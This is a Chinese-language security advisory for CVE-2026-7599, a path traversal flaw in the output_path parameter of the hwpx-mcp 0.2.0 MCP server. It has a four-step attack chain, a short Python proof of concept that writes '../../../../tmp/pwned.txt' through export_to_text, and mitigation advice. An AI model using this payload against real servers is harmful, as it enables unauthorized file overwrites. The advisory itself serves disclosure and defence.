IPBUF安全漏洞报告
English
CVE-2026-7599 CVSS 6.3 中危

CVE-2026-7599: hwpx-mcp路径遍历漏洞

披露日期: 2026-05-01
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-7599
漏洞类型
路径遍历
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Dayoooun hwpx-mcp

相关标签

路径遍历hwpx-mcpCVE-2026-7599MCP Interface文件操作漏洞

漏洞概述

Dayoooun hwpx-mcp 0.2.0版本的MCP接口组件中存在路径遍历漏洞。该漏洞影响`mcp-server/src/index.ts`文件中的`save_document`、`export_to_text`及`export_to_html`函数。由于未正确过滤用户输入的`output_path`参数,攻击者可通过操纵该参数实施路径遍历攻击。目前该漏洞利用方式已公开,且厂商尚未回应。

技术细节

该漏洞源于Dayoooun hwpx-mcp在处理文档导出功能时,未能对`output_path`参数进行严格的路径规范化处理。在`mcp-server/src/index.ts`的指定函数中,程序直接将用户可控的`output_path`参数拼接用于文件写入操作。攻击者可以利用“../”序列或绝对路径绕过预期的目录限制,将文件写入服务器文件系统的任意位置。鉴于攻击复杂度低且无需用户交互,远程攻击者可利用此漏洞覆盖敏感文件或写入恶意数据,导致机密性、完整性及可用性受损。

攻击链分析

STEP 1
1. 信息收集
攻击者识别出目标运行的是Dayoooun hwpx-mcp 0.2.0版本,并确定MCP服务接口的暴露情况。
STEP 2
2. 构造恶意载荷
攻击者构造包含路径遍历字符(如"../")的JSON请求,指定恶意的`output_path`参数,旨在将文件写入系统敏感目录。
STEP 3
3. 发送利用请求
攻击者向受影响的接口端点(如`export_to_text`)发送特制的HTTP请求。
STEP 4
4. 执行路径遍历
服务器端未过滤恶意字符,将文件写入攻击者指定的路径,可能导致敏感文件被覆盖或恶意代码落地。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests import json # Target URL (Example) target_url = "http://target-host:3000/mcp/call" # Exploit payload using path traversal payload = { "method": "tools/call", "params": { "name": "export_to_text", "arguments": { "file_id": "example", "output_path": "../../../../tmp/pwned.txt" # Malicious path traversal } } } try: response = requests.post(target_url, json=payload) print(f"Status: {response.status_code}") print(f"Response: {response.text}") except Exception as e: print(f"Error: {e}")

影响范围

Dayoooun hwpx-mcp 0.2.0

防御指南

临时缓解措施
在官方修复补丁发布前,建议通过网络访问控制列表(ACL)限制对MCP服务端口的访问来源,仅允许可信任的内部IP调用。同时,可部署Web应用防火墙(WAF)规则,拦截包含"../"或绝对路径特征的请求参数。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表